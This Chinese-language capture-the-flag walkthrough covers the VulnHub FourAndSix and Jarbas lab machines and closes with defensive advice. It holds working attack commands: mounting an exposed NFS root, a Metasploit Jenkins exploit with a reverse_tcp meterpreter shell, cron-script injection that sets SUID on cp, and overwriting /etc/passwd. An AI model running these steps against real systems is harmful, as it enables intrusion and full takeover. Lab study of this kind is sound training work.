渗透测试实战：Jarbas和FourandSix靶机教学文档<\/h1>

1. FourandSix靶机渗透测试<\/h2>

1.1 环境准备<\/h3>
靶机下载地址：https:\/\/download.vulnhub.com\/fourandix\/FourAndSix-vmware.zip<\/li>
网络配置：NAT模式，与攻击机(Kali Linux)同网段<\/li> <\/ul>
1.2 信息收集<\/h3>
确定靶机IP<\/strong>：<\/p>
nmap -sP 222.182.111.1\/24
<\/span><\/span><\/code><\/pre>通过扫描确定靶机IP为222.182.111.135<\/p>
<\/li>

端口扫描<\/strong>：<\/p>
nmap -sV 222.182.111.135
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22 (SSH)<\/li>
111 (rpcbind)<\/li>
2049 (NFS)<\/li>
<\/ul>
<\/li>
<\/ol>
1.3 NFS服务利用<\/h3>


安装NFS客户端工具<\/strong>：<\/p>
apt-get install nfs-common
<\/span><\/span><\/code><\/pre><\/li>

查看共享目录<\/strong>：<\/p>
showmount -e 222.182.111.135
<\/span><\/span><\/code><\/pre>发现\/shared<\/code>目录共享<\/p>
<\/li>

挂载共享目录<\/strong>：<\/p>
mkdir \/mnt\/share1
<\/span><\/span>mount -t nfs 222.182.111.135:\/shared \/mnt\/share1
<\/span><\/span><\/code><\/pre><\/li>

探索共享内容<\/strong>：<\/p>
cd \/mnt\/share1
<\/span><\/span>ls
<\/span><\/span><\/code><\/pre>发现USB-stick.img文件<\/p>
<\/li>

挂载img文件<\/strong>：<\/p>
mkdir USB-stick
<\/span><\/span>mount USB-stick.img USB-stick
<\/span><\/span>cd USB-stick
<\/span><\/span>ls -al
<\/span><\/span><\/code><\/pre><\/li>

关键发现<\/strong>：<\/p>
mkdir jlzj
<\/span><\/span>mount 222.182.111.135:\/ jlzj
<\/span><\/span>cd \/jlzj
<\/span><\/span>ls -la
<\/span><\/span><\/code><\/pre>发现可以挂载根目录，直接访问系统文件<\/p>
<\/li>

获取flag<\/strong>：<\/p>
cat \/jlzj\/root\/proof.txt
<\/span><\/span><\/code><\/pre>得到flag：5027a37dc785a5d1888bffd4e249e3dd<\/p>
<\/li>
<\/ol>
2. Jarbas靶机渗透测试<\/h2>
2.1 环境准备<\/h3>

靶机下载地址：https:\/\/download.vulnhub.com\/jarbas\/Jarbas.zip<\/li>
网络配置：NAT模式，与攻击机(Kali Linux)同网段<\/li>
<\/ul>
2.2 信息收集<\/h3>


确定靶机IP<\/strong>：<\/p>
nmap -sP 222.182.111.1\/24
<\/span><\/span><\/code><\/pre>确定靶机IP为222.182.111.137<\/p>
<\/li>

端口扫描<\/strong>：<\/p>
nmap -sV -p- 222.182.111.137
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
3306 (MySQL)<\/li>
8080 (HTTP)<\/li>
<\/ul>
<\/li>
<\/ol>
2.3 Web应用测试<\/h3>


80端口探测<\/strong>：<\/p>

初始访问无显著发现<\/li>
目录爆破：
dirb http:\/\/222.182.111.137:80 \/usr\/share\/dirb\/wordlists\/big.txt
<\/span><\/span><\/code><\/pre><\/li>
扩展名探测：
dirb http:\/\/222.182.111.137:80 -X .php
<\/span><\/span>dirb http:\/\/222.182.111.137:80 -X .html
<\/span><\/span><\/code><\/pre>发现access.html<\/li>
<\/ul>
<\/li>

获取凭据<\/strong>：<\/p>

在access.html中发现三组用户名及密码hash：

tiago:italia99<\/li>
trindade:marianna<\/li>
eder:vipsu<\/li>
<\/ul>
<\/li>
使用MD5解密获得明文密码<\/li>
<\/ul>
<\/li>

8080端口测试<\/strong>：<\/p>

发现Jenkins登录页面<\/li>
使用eder:vipsu成功登录<\/li>
<\/ul>
<\/li>
<\/ol>
2.4 利用Jenkins获取会话<\/h3>

使用Metasploit<\/strong>：
use exploit\/multi\/http\/jenkins_script_console
<\/span><\/span>show options
<\/span><\/span>set target 1<\/span>
<\/span><\/span>set USERNAME eder
<\/span><\/span>set PASSWORD vipsu
<\/span><\/span>set RHOST 222.182.111.137
<\/span><\/span>set RPORT 8080<\/span>
<\/span><\/span>set TARGETURI \/
<\/span><\/span>show payloads
<\/span><\/span>set payload linux\/x86\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST 222.182.111.132
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>成功获取meterpreter会话<\/li>
<\/ol>
2.5 提权<\/h3>


检查定时任务<\/strong>：<\/p>
cat \/etc\/crontab
<\/span><\/span><\/code><\/pre>发现每5分钟执行\/etc\/script\/CleaningScript.sh<\/code><\/p>
<\/li>

利用计划任务提权<\/strong>：<\/p>
cd \/etc\/script\/
<\/span><\/span>echo "chmod u+s \/usr\/bin\/cp"<\/span> > CleaningScript.sh
<\/span><\/span><\/code><\/pre><\/li>

创建伪造的passwd文件<\/strong>：<\/p>
touch passwd
<\/span><\/span>openssl passwd -1 -salt jlzj abc123
<\/span><\/span><\/code><\/pre>生成用户jlzj的密码hash<\/p>
<\/li>

上传并替换passwd文件<\/strong>：<\/p>
upload \/root\/passwd \/tmp
<\/span><\/span>shell
<\/span><\/span>python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>cd \/tmp
<\/span><\/span>cp passwd \/etc\/passwd
<\/span><\/span>cat \/etc\/passwd
<\/span><\/span><\/code><\/pre><\/li>

切换用户获取root权限<\/strong>：<\/p>
su jlzj
<\/span><\/span><\/code><\/pre>输入密码abc123，成功获取root权限<\/p>
<\/li>

获取flag<\/strong>：<\/p>
cd \/root
<\/span><\/span>cat flag.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 关键知识点总结<\/h2>
3.1 NFS服务利用要点<\/h3>

NFS(Network File System)用于网络文件共享<\/li>
rpcbind是NFS的辅助服务<\/li>
通过showmount -e<\/code>查看共享目录<\/li>
使用mount<\/code>命令挂载远程共享<\/li>
注意检查可挂载的目录层级，有时可直接挂载根目录<\/li>
<\/ol>
3.2 Jenkins利用要点<\/h3>

Jenkins是基于Java的持续集成工具<\/li>
默认存在jenkins_script_console<\/code>漏洞利用模块<\/li>
可通过Metasploit获取meterpreter会话<\/li>
<\/ol>
3.3 提权技术要点<\/h3>

检查\/etc\/crontab<\/code>寻找定时任务<\/li>
利用可写的脚本文件注入提权命令<\/li>
使用chmod u+s<\/code>给命令添加SUID权限<\/li>
通过openssl生成用户密码hash<\/li>
替换\/etc\/passwd<\/code>文件添加特权用户<\/li>
<\/ol>
3.4 信息收集技巧<\/h3>

端口扫描时使用-sV<\/code>获取服务版本信息<\/li>
目录爆破时尝试不同字典和扩展名<\/li>
检查网页源代码和隐藏文件<\/li>
注意收集和破解密码hash<\/li>
<\/ol>
4. 防御建议<\/h2>


NFS服务<\/strong>：<\/p>

限制共享目录范围<\/li>
设置只读权限<\/li>
使用防火墙限制访问IP<\/li>
<\/ul>
<\/li>

Jenkins<\/strong>：<\/p>

及时更新到最新版本<\/li>
禁用脚本控制台<\/li>
使用强密码策略<\/li>
<\/ul>
<\/li>

系统安全<\/strong>：<\/p>

定期检查crontab任务<\/li>
限制关键命令的SUID权限<\/li>
监控\/etc\/passwd<\/code>文件变更<\/li>
使用文件完整性监控工具<\/li>
<\/ul>
<\/li>

Web应用<\/strong>：<\/p>

避免在页面中暴露敏感信息<\/li>
使用安全的密码存储方式<\/li>
限制目录遍历<\/li>
<\/ul>
<\/li>
<\/ol>
通过这两个靶机的实战，我们学习了NFS服务利用、Jenkins漏洞利用和多种提权技术，这些知识在实际渗透测试中具有重要价值。<\/p>